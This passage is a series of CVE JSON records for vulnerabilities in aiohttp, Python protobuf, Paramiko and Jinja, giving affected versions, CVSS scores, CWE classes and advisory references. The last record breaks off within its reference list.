Vulnerability from cvelistv5 – Published: 2024-11-18 20:08 – Updated: 2024-11-19 14:45- CWE-772 - Missing Release of Resource after Effective Lifetime
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:aiohttp:aio-libs:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "aio-libs",
"vendor": "aiohttp",
"versions": [
{
"lessThan": "3.10.11",
"status": "affected",
"version": "3.10.6",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-52303",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-19T14:39:25.327719Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-19T14:45:27.044Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.10.6, \u003c 3.10.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In versions starting with 3.10.6 and prior to 3.10.11, a memory leak can occur when a request produces a MatchInfoError. This was caused by adding an entry to a cache on each request, due to the building of each MatchInfoError producing a unique cache entry. An attacker may be able to exhaust the memory resources of a server by sending a substantial number (100,000s to millions) of such requests. Those who use any middlewares with aiohttp.web should upgrade to version 3.10.11 to receive a patch."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-772",
"description": "CWE-772: Missing Release of Resource after Effective Lifetime",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-18T20:08:15.387Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-27mf-ghqm-j3j8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-27mf-ghqm-j3j8"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/bc15db61615079d1b6327ba42c682f758fa96936",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/bc15db61615079d1b6327ba42c682f758fa96936"
}
],
"source": {
"advisory": "GHSA-27mf-ghqm-j3j8",
"discovery": "UNKNOWN"
},
"title": "aiohttp memory leak when middleware is enabled when requesting a resource with a non-allowed method"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-52303",
"datePublished": "2024-11-18T20:08:15.387Z",
"dateReserved": "2024-11-06T19:00:26.396Z",
"dateUpdated": "2024-11-19T14:45:27.044Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-4565 (GCVE-0-2025-4565)
Vulnerability from cvelistv5 – Published: 2025-06-16 14:50 – Updated: 2025-06-16 15:39- CWE-674 - Uncontrolled Recursion
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| protocolbuffers | Python-Protobuf |
Affected:
0 , < 4.25.8
(semver)
Affected: 0 , < 5.29.5 (semver) Affected: 0 , < 6.31.1 (semver) |
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-4565",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-16T15:38:57.654894Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-16T15:39:18.263Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://github.com/protocolbuffers/protobuf/",
"defaultStatus": "unaffected",
"packageName": "protobuf",
"product": "Python-Protobuf",
"programFiles": [
"python/google/protobuf/internal/decoder.py"
],
"repo": "https://github.com/protocolbuffers/protobuf/",
"vendor": "protocolbuffers",
"versions": [
{
"lessThan": "4.25.8",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "5.29.5",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "6.31.1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"collectionURL": "https://pypi.org/project/protobuf/",
"defaultStatus": "unaffected",
"product": "Python-Protobuf",
"repo": "https://pypi.org/project/protobuf/",
"vendor": "protocolbuffers",
"versions": [
{
"lessThan": "4.25.8",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "5.29.5",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "6.31.1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alexis Challande - Trail of Bits Ecosystem Security Team"
}
],
"datePublic": "2025-05-12T22:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAny project that uses \u003c/span\u003e\u003cstrong\u003eProtobuf Pure-Python backend\u003c/strong\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;to parse untrusted Protocol Buffers data containing an arbitrary number of recursive \u003c/span\u003e\u003ccode\u003egroup\u003c/code\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003es, recursive \u003c/span\u003e\u003ccode\u003emessage\u003c/code\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003es or a series of \u003c/span\u003e\u003ccode\u003eSGROUP\u003c/code\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;tags can be corrupted by exceeding the Python recursion limit. This can result in a Denial of service by crashing the application with a RecursionError. We recommend upgrading to version =\u0026gt;6.31.1 or beyond commit\u0026nbsp;17838beda2943d08b8a9d4df5b68f5f04f26d901\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "Any project that uses Protobuf Pure-Python backend\u00a0to parse untrusted Protocol Buffers data containing an arbitrary number of recursive groups, recursive messages or a series of SGROUP\u00a0tags can be corrupted by exceeding the Python recursion limit. This can result in a Denial of service by crashing the application with a RecursionError. We recommend upgrading to version =\u003e6.31.1 or beyond commit\u00a017838beda2943d08b8a9d4df5b68f5f04f26d901"
}
],
"impacts": [
{
"capecId": "CAPEC-130",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-130 Excessive Allocation"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-674",
"description": "CWE-674 Uncontrolled Recursion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-06-16T14:50:40.906Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://github.com/protocolbuffers/protobuf/commit/17838beda2943d08b8a9d4df5b68f5f04f26d901"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Unbounded recursion in Python Protobuf",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2025-4565",
"datePublished": "2025-06-16T14:50:40.906Z",
"dateReserved": "2025-05-12T05:48:12.941Z",
"dateUpdated": "2025-06-16T15:39:18.263Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-34525 (GCVE-0-2026-34525)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:28 – Updated: 2026-06-23 15:50| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34525",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T15:13:27.201947Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-23T15:50:59.771Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, multiple Host headers were allowed in aiohttp. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:28:46.652Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-c427-h43c-vf67",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: Duplicate Host header accepted"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34525",
"datePublished": "2026-04-01T20:28:46.652Z",
"dateReserved": "2026-03-30T16:03:31.048Z",
"dateUpdated": "2026-06-23T15:50:59.771Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-44405 (GCVE-0-2026-44405)
Vulnerability from cvelistv5 – Published: 2026-05-05 23:50 – Updated: 2026-05-06 12:54- CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44405",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-06T12:54:08.285055Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-06T12:54:17.468Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageURL": "pkg:pypi/paramiko",
"product": "Paramiko",
"vendor": "Paramiko",
"versions": [
{
"lessThan": "a4489456b6f65281e172380cc4826cee5e851dbb",
"status": "affected",
"version": "0",
"versionType": "git"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:paramiko:paramiko:*:*:*:*:*:*:*:*",
"versionEndExcluding": "a4489456b6f65281e172380cc4826cee5e851dbb",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In Paramiko through 4.0.0 before a448945, rsakey.py allows the SHA-1 algorithm."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.4,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-327",
"description": "CWE-327 Use of a Broken or Risky Cryptographic Algorithm",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T23:55:03.332Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/paramiko/paramiko/commit/a4489456b6f65281e172380cc4826cee5e851dbb"
},
{
"url": "https://ostif.org/wp-content/uploads/2026/05/25-11-2415-REP_paramiko-security-audit_v1.1.pdf"
}
],
"x_generator": {
"engine": "CVE-Request-form 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2026-44405",
"datePublished": "2026-05-05T23:50:52.811Z",
"dateReserved": "2026-05-05T23:50:52.416Z",
"dateUpdated": "2026-05-06T12:54:17.468Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-56201 (GCVE-0-2024-56201)
Vulnerability from cvelistv5 – Published: 2024-12-23 15:37 – Updated: 2025-02-18 21:47- CWE-150 - Improper Neutralization of Escape, Meta, or Control Sequences
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-56201",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-12-24T01:44:55.825619Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-18T21:47:42.763Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "jinja",
"vendor": "pallets",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.1.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Jinja is an extensible templating engine. In versions on the 3.x branch prior to 3.1.5, a bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of if Jinja\u0027s sandbox is used. To exploit the vulnerability, an attacker needs to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates where the template author can also choose the template filename. This vulnerability is fixed in 3.1.5."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "LOCAL",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-150",
"description": "CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-08T16:06:29.739Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699"
},
{
"name": "https://github.com/pallets/jinja/issues/1792",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/jinja/issues/1792"
},
{
"name": "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f"
},
{
"name": "https://github.com/pallets/jinja/releases/tag/3.1.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/jinja/releases/tag/3.1.5"
}
],
"source": {
"advisory": "GHSA-gmj6-6f8f-6699",
"discovery": "UNKNOWN"
},
"title": "Jinja has a sandbox breakout through malicious filenames"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-56201",
"datePublished": "2024-12-23T15:37:36.110Z",
"dateReserved": "2024-12-18T18:29:25.896Z",
"dateUpdated": "2025-02-18T21:47:42.763Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-0994 (GCVE-0-2026-0994)
Vulnerability from cvelistv5 – Published: 2026-01-23 14:55 – Updated: 2026-06-30 12:07- CWE-674 - Uncontrolled Recursion
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-0994",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-23T15:33:48.514298Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-23T15:34:38.915Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.6::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.6::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.0::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::crb"
],
"defaultStatus": "affected",
"product": "Red Hat CodeReady Linux Builder EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::crb"
],
"defaultStatus": "affected",
"product": "Red Hat CodeReady Linux Builder EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3.2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server 3.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el10",
"cpe:/a:redhat:ansible_automation_platform_developer:2.6::el10"
],
"defaultStatus": "unaffected",
"product": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_clients:2023"
],
"defaultStatus": "unaffected",
"product": "Red Hat AMQ Clients",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:hummingbird:1"
],
"defaultStatus": "unaffected",
"product": "Red Hat Hardened Images",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:16.2"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenStack Platform 16.2",
"vendor": "Red Hat"
}
],
"datePublic": "2026-01-23T14:55:16.876Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in protobuf. A remote attacker can exploit this denial-of-service (DoS) vulnerability by supplying deeply nested `google.protobuf.Any` messages to the `google.protobuf.json_format.ParseDict()` function. This bypasses the intended recursion depth limit, leading to the exhaustion of Python\u2019s recursion stack and causing a `RecursionError`, which results in a denial of service."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-674",
"description": "Uncontrolled Recursion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-30T12:07:10.896Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-0994"
},
{
"name": "RHBZ#2432398",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2432398"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-0994.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3959"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3958"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3218"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3094"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3097"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3220"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3059"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3219"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3095"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3461"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3462"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8748"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8746"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
